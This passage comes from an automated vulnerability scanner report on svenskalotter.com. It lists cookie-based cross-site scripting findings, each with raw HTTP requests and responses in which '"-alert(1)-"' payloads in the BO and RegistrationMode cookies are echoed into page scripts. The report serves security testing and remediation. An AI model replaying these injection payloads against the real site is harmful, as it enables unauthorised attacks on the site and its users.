Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMdedde"-alert(1)-"ae918ea2a0e; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: BO=FMdedde"-alert(1)-"ae918ea2a0e; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMdedde"-alert(1)-"ae918ea2a0e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.445. http://www.svenskalotter.com/Promotions.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd889"-alert(1)-"ffa9dbb0130 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMbd889"-alert(1)-"ffa9dbb0130; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMbd889"-alert(1)-"ffa9dbb0130; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:21 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMbd889"-alert(1)-"ffa9dbb0130";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.446. http://www.svenskalotter.com/Responsible.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd471"-alert(1)-"bd1152df0ff was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMbd471"-alert(1)-"bd1152df0ff; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/
Set-Cookie: BO=FMbd471"-alert(1)-"bd1152df0ff; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:41 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42103


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMbd471"-alert(1)-"bd1152df0ff";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.447. http://www.svenskalotter.com/Responsible.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 364f9"-alert(1)-"7105550917d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM364f9"-alert(1)-"7105550917d; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM364f9"-alert(1)-"7105550917d; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42103


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM364f9"-alert(1)-"7105550917d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.448. http://www.svenskalotter.com/SecurityAndPrivacy.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d17f"-alert(1)-"8c5694280b1 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM8d17f"-alert(1)-"8c5694280b1; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: BO=FM8d17f"-alert(1)-"8c5694280b1; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:33 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM8d17f"-alert(1)-"8c5694280b1";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.449. http://www.svenskalotter.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81d92"-alert(1)-"6a66628d624 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM81d92"-alert(1)-"6a66628d624; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM81d92"-alert(1)-"6a66628d624; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35242


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM81d92"-alert(1)-"6a66628d624";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.450. http://www.svenskalotter.com/Terms.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c550"-alert(1)-"353d71a5ded was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM1c550"-alert(1)-"353d71a5ded; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: BO=FM1c550"-alert(1)-"353d71a5ded; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM1c550"-alert(1)-"353d71a5ded";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.451. http://www.svenskalotter.com/Terms.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48d45"-alert(1)-"07a119d68b9 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Terms.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM48d45"-alert(1)-"07a119d68b9; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM48d45"-alert(1)-"07a119d68b9; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:30 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM48d45"-alert(1)-"07a119d68b9";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.452. http://www.svenskalotter.com/UnderAge.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8028c"-alert(1)-"eacd23dd7a9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM8028c"-alert(1)-"eacd23dd7a9; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: BO=FM8028c"-alert(1)-"eacd23dd7a9; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:45 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM8028c"-alert(1)-"eacd23dd7a9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.453. http://www.svenskalotter.com/UnderAge.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7950"-alert(1)-"32888f9fa48 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where that cannot be avoided, every character of the value outside the set [A-Za-z0-9] should be encoded as a JavaScript escape (\xHH or \uHHHH) before it is placed in the string literal; escaping quotes alone is not enough, because a </script> sequence inside the literal still ends the script element.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMb7950"-alert(1)-"32888f9fa48; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb7950"-alert(1)-"32888f9fa48; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:34 GMT; path=/
